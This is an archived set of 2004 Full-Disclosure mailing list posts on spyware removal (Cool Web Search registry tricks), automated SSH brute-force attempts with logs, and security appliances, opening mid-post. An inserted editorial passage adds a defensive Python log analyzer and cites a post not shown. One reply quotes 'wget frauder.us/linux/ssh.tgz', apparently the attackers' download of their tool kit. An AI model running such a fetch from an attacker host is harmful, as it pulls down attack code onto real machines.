Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBCnb7cC3lWbTT17ARAi1tAKDA6hak2fQi+JavaLv1W6bmfyieZACg3trC
RCVw+JWLX8dRexhDnxMM4sA=
=2nyI
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Re: OpenServer 5.0.6 OpenServer 5.0.7 : Multiple Vulnerabilities in Sendmail

From: Barry Fitzgerald (bkfsecsdf.lonestar.org)
Date: Fri Jul 30 2004 - 09:34:41 CDT


Frank Knobbe wrote:

>(After all, why fix it if they file Chapter 11 by end of the year
>anyway?)
>
>
>

We can only hope... maybe if we get lucky they'll be forced to file in
September. Or, perhaps, just fall off the end of the earth... Yeah,
that'd be a good thing.

             -Barry

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: Re: [Full-Disclosure] Cool Web Search

kquesttoplayer.com
Date: Fri Jul 30 2004 - 11:25:22 CDT


You are probably talking about BHODemon,
which can be found at http://www.definitivesolutions.com/bhodemon.htm .

Kyle
-----Original Message-----
From: Todd Towles [mailto:toddtowlesbrookshires.com]
Sent: Friday, July 30, 2004 11:00 AM
To: 'Rmuge NineFive '; 'Disclosure Full'
Subject: RE: Re: [Full-Disclosure] Cool Web Search

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Neal O'Creat (idsll.mit.edu)
Date: Fri Jul 30 2004 - 08:39:55 CDT


Could it be possible that there are different versions of this, one
making noise and one much rarer one with an exploit?

-Neal

Andrei Galca-Vasiliu wrote:
> I've seen that too, on several machines, different range of ip's. I guess it's
> some sort of a mass bruteforce exploit (there were 50 or more attempts on my
> box in just 20-30 s). Anyone who can enlighten us, it will be appreciated,
> i've searched too and couldn't find anything related.
>
> In a mail dated Thursday 22 July 2004 17:47, Jay Libove wrote:
>
>>[ Posted to full disclosure and vulnwatch; please edit reply address(es)
>>as appropriate. Thanks. -Jay ]
>>
>>My Linux system, and a Linux system run by a friend here in the same city
>>but on a completely different netblock (different ISP), have both seen
>>apparently automated attempts to log in to our systems via SSH in the past
>>few days. Looks like a script.
>>
>>
>>Here are some log entries from my system:
>>
>>Jul 15 10:01:34 panther6 sshd[8267]: Illegal user test from 62.67.45.4
>>Jul 15 10:01:34 panther6 sshd[8267]: Failed password for illegal user test from 62.67.45.4 port 39141 ssh2
>>Jul 15 10:01:36 panther6 sshd[8269]: Illegal user guest from 62.67.45.4
>>Jul 15 10:01:36 panther6 sshd[8269]: Failed password for illegal user guest from 62.67.45.4 port 39192 ssh2
>>Jul 15 10:01:37 panther6 sshd[8271]: Illegal user admin from 62.67.45.4
>>Jul 15 10:01:37 panther6 sshd[8271]: Failed password for illegal user admin from 62.67.45.4 port 39234 ssh2
>>Jul 15 10:01:38 panther6 sshd[8273]: Illegal user user from 62.67.45.4
>>Jul 15 10:01:38 panther6 sshd[8273]: Failed password for illegal user user from 62.67.45.4 port 39275 ssh2
>>Jul 15 10:01:39 panther6 sshd[8275]: Failed password for root from 62.67.45.4 port 39340 ssh2
>>Jul 15 10:01:41 panther6 sshd[8277]: Failed password for root from 62.67.45.4 port 39386 ssh2
>>Jul 15 10:44:12 panther6 sshd[8300]: Illegal user test from 62.67.45.4
>>Jul 15 10:44:12 panther6 sshd[8300]: Failed password for illegal user test from 62.67.45.4 port 33771 ssh2
>>Jul 15 10:44:14 panther6 sshd[8302]: Illegal user guest from 62.67.45.4
>>Jul 15 10:44:14 panther6 sshd[8302]: Failed password for illegal user guest from 62.67.45.4 port 33828 ssh2
>>Jul 15 10:44:15 panther6 sshd[8304]: Illegal user admin from 62.67.45.4
>>Jul 15 10:44:15 panther6 sshd[8304]: Failed password for illegal user admin from 62.67.45.4 port 33876 ssh2
>>Jul 15 10:44:16 panther6 sshd[8306]: Illegal user user from 62.67.45.4
>>Jul 15 10:44:16 panther6 sshd[8306]: Failed password for illegal user user from 62.67.45.4 port 33916 ssh2
>>Jul 15 10:44:17 panther6 sshd[8308]: Failed password for root from 62.67.45.4 port 33988 ssh2
>>Jul 15 10:44:19 panther6 sshd[8310]: Failed password for root from 62.67.45.4 port 34032 ssh2
>>Jul 15 17:07:15 panther6 sshd[8912]: Illegal user test from 131.234.36.152
>>Jul 15 17:07:15 panther6 sshd[8912]: Failed password for illegal user test from 131.234.36.152 port 38287 ssh2
>>Jul 15 17:07:16 panther6 sshd[8914]: Illegal user guest from 131.234.36.152
>>Jul 15 17:07:16 panther6 sshd[8914]: Failed password for illegal user guest from 131.234.36.152 port 38326 ssh2
>>Jul 15 17:07:18 panther6 sshd[8916]: Illegal user admin from 131.234.36.152
>>Jul 15 17:07:18 panther6 sshd[8916]: Failed password for illegal user admin from 131.234.36.152 port 38370 ssh2
>>Jul 15 17:07:19 panther6 sshd[8918]: Illegal user admin from 131.234.36.152
>>Jul 15 17:07:19 panther6 sshd[8918]: Failed password for illegal user admin from 131.234.36.152 port 38412 ssh2
>>Jul 15 17:07:21 panther6 sshd[8920]: Illegal user user from 131.234.36.152
>>Jul 15 17:07:21 panther6 sshd[8920]: Failed password for illegal user user from 131.234.36.152 port 38468 ssh2
>>Jul 15 17:07:22 panther6 sshd[8922]: Failed password for root from 131.234.36.152 port 38516 ssh2
>>Jul 15 17:07:23 panther6 sshd[8924]: Failed password for root from 131.234.36.152 port 38558 ssh2
>>Jul 15 17:07:25 panther6 sshd[8926]: Failed password for root from 131.234.36.152 port 38611 ssh2
>>Jul 15 17:07:26 panther6 sshd[8928]: Illegal user test from 131.234.36.152
>>Jul 15 17:07:26 panther6 sshd[8928]: Failed password for illegal user test from 131.234.36.152 port 38675 ssh2
>>Jul 19 22:05:07 panther6 sshd[30439]: Illegal user test from 83.103.27.66
>>Jul 19 22:05:07 panther6 sshd[30439]: Failed password for illegal user test from 83.103.27.66 port 52671 ssh2
>>Jul 19 22:05:08 panther6 sshd[30441]: Illegal user guest from 83.103.27.66
>>Jul 19 22:05:08 panther6 sshd[30441]: Failed password for illegal user guest from 83.103.27.66 port 52687 ssh2
>>Jul 21 06:30:12 panther6 sshd[1103]: Illegal user test from 219.103.193.130
>>Jul 21 06:30:12 panther6 sshd[1103]: Failed password for illegal user test from 219.103.193.130 port 55802 ssh2
>>Jul 21 06:30:14 panther6 sshd[1105]: Illegal user guest from 219.103.193.130
>>Jul 21 06:30:14 panther6 sshd[1105]: Failed password for illegal user guest from 219.103.193.130 port 55823 ssh2
>>
>>
>> .. and some log entries from my friend's system:
>>
>>Jul 19 21:04:33 quack sshd[28379]: Illegal user test from 131.234.157.10
>>Jul 19 21:04:34 quack sshd[28381]: Illegal user guest from 131.234.157.10
>>Jul 19 21:04:36 quack sshd[28383]: Illegal user admin from 131.234.157.10
>>Jul 19 21:04:37 quack sshd[28385]: Illegal user admin from 131.234.157.10
>>Jul 19 21:04:38 quack sshd[28387]: Illegal user user from 131.234.157.10
>>Jul 19 21:04:43 quack sshd[28400]: Illegal user test from 131.234.157.10
>>Jul 22 09:39:10 quack sshd[7646]: Illegal user test from 156.17.99.11
>>Jul 22 09:39:11 quack sshd[7648]: Illegal user guest from 156.17.99.11
>>
>>
>>I have not seen any notes about this on the vulnerability discussion
>>lists. Has anyone else noticed it? What specific vulnerability (or
>>default password?) is this looking for?
>>
>>-Jay Libove, CISSP
>>libovefelines.org
>>Atlanta, GA US
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
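Both Andrew Daviel's cross-post (a scanner trying test/test and guest/guest) and the sshd lines Jay Libove quotes describe the same defender-side signal: a short burst of failed logins for a handful of default account names from one source. The Python below, an added example that is not part of any post in this thread, parses that 2004-era sshd log wording and reports per source address how many failures occurred, the peak rate in a 60-second window, and whether the accounts tried match the default-account probe. The sample log lines are constructed (documentation-range addresses, made-up PIDs), and the names parse_failures, analyze and DEFAULT_ACCOUNTS are this example's own.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the sshd syslog format quoted in the thread. The host
# name, PIDs and addresses (documentation ranges) are made up for this example.
SAMPLE_LOG = """\
Jul 15 10:01:34 panther6 sshd[8267]: Illegal user test from 192.0.2.10
Jul 15 10:01:34 panther6 sshd[8267]: Failed password for illegal user test from 192.0.2.10 port 39141 ssh2
Jul 15 10:01:36 panther6 sshd[8269]: Illegal user guest from 192.0.2.10
Jul 15 10:01:36 panther6 sshd[8269]: Failed password for illegal user guest from 192.0.2.10 port 39192 ssh2
Jul 15 10:01:39 panther6 sshd[8275]: Failed password for root from 192.0.2.10 port 39340 ssh2
Jul 15 10:01:41 panther6 sshd[8277]: Failed password for root from 192.0.2.10 port 39386 ssh2
Jul 15 11:22:03 panther6 sshd[8401]: Failed password for alice from 198.51.100.7 port 41000 ssh2
Jul 15 11:22:09 panther6 sshd[8403]: Accepted password for alice from 198.51.100.7 port 41002 ssh2
"""

# Account names the scanner in the thread tries (test, guest) plus the other
# names that appear in the quoted logs.
DEFAULT_ACCOUNTS = {"test", "guest", "admin", "user", "root"}

# Every failed attempt yields a "Failed password" line; the preceding
# "Illegal user" line is informational, so counting only the former avoids
# counting one attempt twice.
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:illegal user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(log_text):
    """Yield (timestamp, user, source_ip) for every failed-password line."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            # syslog timestamps carry no year; deltas within one file are still right
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            yield ts, m.group("user"), m.group("ip")


def analyze(log_text, window_s=60, threshold=3):
    """Summarise failures per source IP and flag sources that either burst
    (>= threshold failures inside window_s seconds) or probe two or more of
    the DEFAULT_ACCOUNTS names."""
    by_ip = defaultdict(list)
    for ts, user, ip in parse_failures(log_text):
        by_ip[ip].append((ts, user))

    report = {}
    for ip, events in by_ip.items():
        events.sort()
        # Sliding window over the sorted timestamps: peak count in any window.
        peak = start = 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        users = {u for _, u in events}
        probe = users & DEFAULT_ACCOUNTS
        report[ip] = {
            "failures": len(events),
            "peak_in_window": peak,
            "users": sorted(users),
            "default_account_probe": len(probe) >= 2,
            "flagged": peak >= threshold or len(probe) >= 2,
        }
    return report


if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        tag = "SCANNER?" if info["flagged"] else "ok"
        print(f"{ip:16} {tag:9} failures={info['failures']} "
              f"peak/{60}s={info['peak_in_window']} users={','.join(info['users'])}")
```

Point it at the real auth log (on Debian of that era, /var/log/auth.log) instead of SAMPLE_LOG. A flagged source is a candidate for a firewall block or closer review; an unflagged source with a single failure followed by an accepted login is the ordinary typo case and should not be touched, which is why the rule keys on burst rate and on the set of account names rather than on any single failure.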


 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

From: morning_wood (se_cur_ityhotmail.com)
Date: Fri Jul 30 2004 - 12:06:20 CDT


> wget frauder.us/linux/ssh.tgz
http://frauder.us serves up putty.exe ( v 0.54 ) on connect
as "frauder", no extension. Probably not your average admin
tool setup...

m.wood

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: Re: [Full-Disclosure] Cool Web Search

From: Brendan Dolan-Gavitt (mooyixgmail.com)
Date: Fri Jul 30 2004 - 12:16:17 CDT


On Fri, 30 Jul 2004 09:59:54 -0500, Todd Towles
<toddtowlesbrookshires.com> wrote:
> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?

It should be at
http://www.spywareinfo.com/~merijn/downloads.html

but spywareinfo.com seems to be down right now.

A list of current known BHOs is at
http://sysinfo.org/

I can attest as a university Helpdesk person that current
spyware/adware is a far larger problem than normal viruses and trojans
right now...

-Brendan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Cool Web Search

From: JacK (jackwebsecurite.org)
Date: Fri Jul 30 2004 - 12:16:13 CDT


Message: 30
From: "Gregh" <chowsozemail.com.au>

> Sorry but totally and utterly incorrect. You just do NOT understand what I
> have typed. I said that I used HiJackThis to list the entries in a group
> then ticked them manually and then removed them. Along with that, it
> allowed
> you to identify the exe files that went with it.

Rather you don't understand what we are speaking about : we discuss new
tricky CWS variants

> If you dont understand that then I can understand that you dont know how
> to
> get rid of it but the truth is that this way DOES get rid of it. There are
> at LEAST 5 variants of CWS. I have met them all and beat them all.

Oh ? I know at least 30 :-D
The old ones are very kind and you can easily get rid of it the way you give
but for the new ones, you may forget it :o)

If you don't understand that there are new variants, it's useless trying to
explain how to get rid of the classic variants : anybody knows how to handle
them. It DOES NOT WORK for the newer variants. Is that beyond your
understanding ?

Regards,
--
JacK

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: Re: [Full-Disclosure] Cool Web Search

From: Goudie, Derek (derek.goudieearthtech.ca)
Date: Fri Jul 30 2004 - 12:40:11 CDT


http://www.definitivesolutions.com/bhodemon.htm

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Todd Towles
Sent: Friday, July 30, 2004 9:00 AM
To: 'Rmuge NineFive '; 'Disclosure Full'
Subject: RE: Re: [Full-Disclosure] Cool Web Search

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
[Full-Disclosure] Re: Automated SSH login attempts?

From: Dan Margolis (krispykringlegentoo.org)
Date: Fri Jul 30 2004 - 12:35:14 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I've compiled a handful of notes and relevant files at
http://dev.gentoo.org/~krispykringle/sshnotes.txt .

If anybody has any more information or can derive more information from
these files than I have so far, please let me know.

- --
Dan ("KrispyKringle")
Gentoo Linux Security Coordinator
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iQEVAwUBQQqG0bDO2aFJ9pv2AQJwBQf/dhXUNFBgSgfIfefCLrzYNFwr/ejwku6O
5QvqQ/xgifi0KWy+NqbW5IIv44ibY+9j3a6PTA8Nt47kgu9vDQPB/gFsU8Mht8l8
FZQYnHj/tME1tpT5zgMvXA5Tn9vUKf9PXV5s9uCw5o65hbMPPmT+1PpVe27D74H2
f3BtHcqGA6yZMScqc7DQmUehh9cdKcS8CM8//hYmLiNP+esUMfd3ZvE5mY4J8dxE
OEJf6Zdhr6T9+y1BkHuZOmbqASL3YGV3yuYv4j9YPiMvNnL3sdFSOYcXA3ZQc6xu
1YbQp8lNsYMeW1bWk1hTmoF/bR0JUiPyXVPqRKot206Mf4JOgWPdUw==
=sENF
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: Re: [Full-Disclosure] Cool Web Search

From: KUIJPERS Jimmy (Jimmy.KUIJPERSswift.com)
Date: Fri Jul 30 2004 - 12:11:46 CDT


Yep, BHODemon is the best. Especially the newest version has some major improvements.

Don't have the link but it's very googleable and the site is something like www.bhodeamon.com or so.

Cheers
 

-----Original Message-----
From: full-disclosure-adminlists.netsys.com [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Todd Towles
Sent: Friday, July 30, 2004 5:00 PM
To: 'Rmuge NineFive '; 'Disclosure Full'
Subject: RE: Re: [Full-Disclosure] Cool Web Search

There is a free piece of software somewhere that will grab all the BHOs
(Browser Helper Objects) out of the registry and display them all. Anyone
remember where this software can be found?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
Sent: Friday, July 30, 2004 8:47 AM
To: Disclosure Full
Subject: Re: Re: [Full-Disclosure] Cool Web Search

Regarding removal of newer versions of Cool Web Search.

 See this web page.

http://www.pchell.com/support/onlythebest.shtml

I have encountered the problem described on the page and successfully
removed the Hijack using Hijackthis
and AboutBuster.

Spybot and AdAware did not detect the BHO elements.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




 
Re: Re: [Full-Disclosure] Cool Web Search

From: JacK (jackwebsecurite.org)
Date: Fri Jul 30 2004 - 11:56:26 CDT


> I don't know if you fully understand HiJackThis or maybe I was just
> unclear.

> HiJackThis wasn't used by me to get rid of CWS as, for example, running
> Adaware gets rid of tracking cookies and some installed spyware progs. It
> was used by me to list various entries in registry which, when lumped
> together like that, show off CWS quite easily. Once they are there, removing
> them and the progs started by some of them is easy.

> That is all you have to do. Don't expect HiJackThis to magically get rid of
> it all at the flick of a button. You DO have to have a small amount of
> registry knowledge in order to ID which entries are seriously bull and which
> are honest BHOs etc. I am not a registry "expert" but claim a small amount
> of registry knowledge so even to ME it was obvious what was what.

It's obvious you did not get the variants I am speaking about and you are
no Registry "expert" ;)

For those variants:

HijackThis lets you see the entry
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_DLLs
(and in most cases with no value) BUT when you delete it and click refresh,
it comes back immediately because the trojan is still running.
If you kill the associated running random-name DLL (for instance
c:\windows\system32\logb.dll) it comes back at the next reboot and adds the
value AppInit_DLLs again in the registry.

To get rid of it, you have to rename the key
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Windows to Windows2,
then delete the entry AppInit_DLLs which seems to have no value. When
done, rename the key back to its regular name and AppInit_DLLs will not appear
anymore when refreshing; only when that's done will you be able to kill and
delete the random-name DLL for good, which is the Backdoor.Agent.ba used to
install this tricky variant of CoolWebSearch.

That's why I said HijackThis has its limits: deleting the entries its
log gives directly from the registry does not help.

That's just an example; there are other variants which add the registry
entry AppInit_Dlls somewhere else with the same result and the same way to
get rid of it.

Hoping it's clearer now; sorry for my poor English.

Regards,
--
http://www.optimix.be.tf /MVP WindowsXP/ http://websecurite.org
http://www.msmvps.com/XPditif/
http://experts.microsoft.fr/longhorn4u/
                         *Helping you void your warranty since 2000*

(*0*) JacK

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: Re: [Full-Disclosure] Cool Web Search

From: Jon (ka1lshhotmail.com)
Date: Fri Jul 30 2004 - 11:38:55 CDT


"BHODemon" works nicely - the home page is
http://www.definitivesolutions.com/bhodemon.htm. Due to recent coverage at
SANS and Slashdot, the following flurry of attention required the author to
get the program distributed via some mirror sites.

----- Original Message -----
From: "Todd Towles" <toddtowlesbrookshires.com>
To: "'Rmuge NineFive '" <rmug9500lycos.co.uk>; "'Disclosure Full'"
<full-disclosurelists.netsys.com>
Sent: Friday, July 30, 2004 10:59 AM
Subject: RE: Re: [Full-Disclosure] Cool Web Search

> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
> Sent: Friday, July 30, 2004 8:47 AM
> To: Disclosure Full
> Subject: Re: Re: [Full-Disclosure] Cool Web Search
>
> Regarding removal of newer versions of Cool Web Search.
>
> See this web page.
>
> http://www.pchell.com/support/onlythebest.shtml
>
> I have encountered the problem described on the page and successfully
> removed the Hijack using Hijackthis
> and AboutBuster.
>
> Spybot and AdAware did not detect the BHO elements.
>
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Cool Web Search

From: Denis McMahon (denis.mcmahonntlworld.com)
Date: Fri Jul 30 2004 - 13:21:57 CDT


Todd Towles wrote:

> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?

HijackThis shows the BHOs:

http://www.spywareinfo.com/%7Emerijn/index.html

and some utils from www.sysinternals.com are useful as well:

http://www.sysinternals.com/

esp. Autoruns and Process Explorer

Denis

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Bernardo Santos Wernesback (bernardoish.com.br)
Date: Fri Jul 30 2004 - 12:55:04 CDT


Hi all,

A few colleagues and I started a discussion as to why one should or shouldn't buy an appliance-based firewall, IDS/IPS or other security appliance instead of installing software on a server.

We thought about patching, performance, and other reasons for each option, but I'd like to hear what other people think.

I would really appreciate if you could share your thoughts with me.

Thanks in advance,

Bernardo Santos Wernesback
Consultant / ISH Tecnologia
Phone: +55-27-3334-8900
email: bernardoish.com.br

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] New IE patch

From: joe smith (joejoesmith.homeip.net)
Date: Fri Jul 30 2004 - 13:17:58 CDT


Perfect timing for System Admin Day, a new IE patch

http://www.microsoft.com/technet/security/bulletin/ms04-025.mspx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Valdis.Kletnieksvt.edu
Date: Fri Jul 30 2004 - 13:39:40 CDT


On Fri, 30 Jul 2004 09:39:55 EDT, "Neal O'Creat" said:
> Could it be possible that there are different versions of this, one
> making noise and one much rarer one with an exploit?

It's more likely that there's one version, making noise and very rarely finding
a box with stupid passwords. It's possible there's another rare version that
tries several stupid passwords and a few old SSH vulnerabilities. Is there
*any* reliable evidence (even a single box) that appears to have been nailed by
a new exploit?

I'll gladly change my mind, but it will take somebody actually finding a
box running a *recent* SSH and had guest/test/and_so_on properly secured,
and the attack *still* got in....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBCpXscC3lWbTT17ARAmSzAKC/ViVWigp4F8nfGPKvcl7SP2i6BQCgtTmX
UzJMQh2aK504xm1h8uUV9kY=
=L6v7
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Cool Web Search

From: Andrew Clover (and-bugtraqdoxdesk.com)
Date: Fri Jul 30 2004 - 13:26:55 CDT


Gregh <chowsozemail.com.au> wrote:

> the truth is that this way DOES get rid of it. There are
> at LEAST 5 variants of CWS.

Oh, there are *many* more than that.

> I have met them all and beat them all.

Obviously you have not met the CWS/About variant. This cannot be removed
with only HijackThis and the Task Manager, as its process will recreate
any registry entries you delete. Which process? Every process you are
running, thanks to the AppInit_DLLs entry.

> All easily beaten by using HiJackThis in the way I described.

Well done. Now go install CWS/About, TVMedia/BHO, CommonName/Comwiz and
HuntBar/WinTools, and see how you get on.

HijackThis is a brilliant tool. But it is not a panacea, and the worst
of the crop are starting to code around the things it can do.

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Cool Web Search

From: Valdis.Kletnieksvt.edu
Date: Fri Jul 30 2004 - 13:32:54 CDT


On Fri, 30 Jul 2004 09:59:54 CDT, Todd Towles <toddtowlesbrookshires.com> said:
> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?

I've always suspected that Browser Helper did for the browser what
Hamburger Helper does for hamburger....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBCpRWcC3lWbTT17ARAnSnAKCwYafNKyixTvk9gMVQJqSqx83y1wCfafRw
ZKjOkZLjQvpf0cTiVnwe2+I=
=/GmG
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Paul Schmehl (paulsutdallas.edu)
Date: Fri Jul 30 2004 - 13:34:02 CDT


--On Friday, July 30, 2004 02:55:04 PM -0300 Bernardo Santos Wernesback
<bernardoish.com.br> wrote:
>
> A few colleagues and I started a discussion as to why one should or
> shouldn't buy an appliance-based firewall, ids/ips or other security
> appliance instead of installing software on a server.
>
> We thought about patching, performance, and other reason for each option
> but I'd like to hear what other people think.
>
> I would really appreciate if you could share your thoughts with me.
>
1) Most appliance-based devices do not allow access to the operating system
from the application. In fact, they don't even allow access to the
application, except for its configuration.

2) Most appliance-based devices have a kernel and OS that is specifically
built (or the latest buzz word "purpose-built") for the service they
provide, making them capable of running on lower speed processors and lower
memory footprints than a general purpose OS (or conversely, capable of
doing a great deal more with the same CPU speed and memory footprint.)

Those are the two main benefits that I hear most often touted. I haven't
done any research into those claims. Perhaps someone else has?

Paul Schmehl (paulsutdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: Re: [Full-Disclosure] Cool Web Search

From: Aaron Horst (anthrax101gmail.com)
Date: Fri Jul 30 2004 - 12:07:02 CDT


The program is called BHODemon. It is available from Definitive Solutions here:

http://www.definitivesolutions.com/bhodemon.htm

On Fri, 30 Jul 2004 09:59:54 -0500, Todd Towles
<toddtowlesbrookshires.com> wrote:
> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?
>
>
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
> Sent: Friday, July 30, 2004 8:47 AM
> To: Disclosure Full
> Subject: Re: Re: [Full-Disclosure] Cool Web Search
>
> Regarding removal of newer versions of Cool Web Search.
>
> See this web page.
>
> http://www.pchell.com/support/onlythebest.shtml
>
> I have encountered the problem described on the page and successfully
> removed the Hijack using Hijackthis
> and AboutBuster.
>
> Spybot and AdAware did not detect the BHO elements.
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Max Valdez (maxvaldefis.unam.mx)
Date: Fri Jul 30 2004 - 13:26:12 CDT


Because you don't know that much about security??? (a theoretical "you"!!)

If you know what you need, and what you can do, you do it by yourself, and
only rely on your capacities.

If you need protection, or at least some kind of monitoring activity, but don't
know much about network security, then you go and buy a solution.

That's what I think.

BTW, all the network admins I know use firewalls for protection, but don't know
much aside from that, most of the time use some kind of precoded rules, and
keep it like that forever.

--
Linux garaged 2.6.7-rc3-mm2 #2 Sat Jun 19 15:43:32 CDT 2004 i686 Intel(R)
Pentium(R) 4 CPU 2.80GHz GenuineIntel GNU/Linux
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GS/S d- s: a-29 C++(+++) ULAHI+++ P+ L++>+++ E--- W++ N* o-- K- w++++ O- M--
V-- PS+ PE Y-- PGP++ t- 5- X+ R tv++ b+ DI+++ D- G++ e++ h+ r+ z**
------END GEEK CODE BLOCK------
gpg-key: http://garaged.homeip.net/gpg-key.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: Re: [Full-Disclosure] Cool Web Search

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 14:13:02 CDT


Jack, the new variants are not so obvious to detect. They contain hidden
processes or rootkits. Sooner or later they will start to use ADS (alternate
data stream) points to hide.

Anyone can track down anything with a registry snapshot. Do a registry
snapshot and then install your "spyware" and then you will see every key.
But what good is that if you have to clean more than one computer.

We are all computer people - fixing one computer is easy but could take 4
hours - not very helpful on a mass scale. We pay for point and click, why
shouldn't we get it? ;)

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
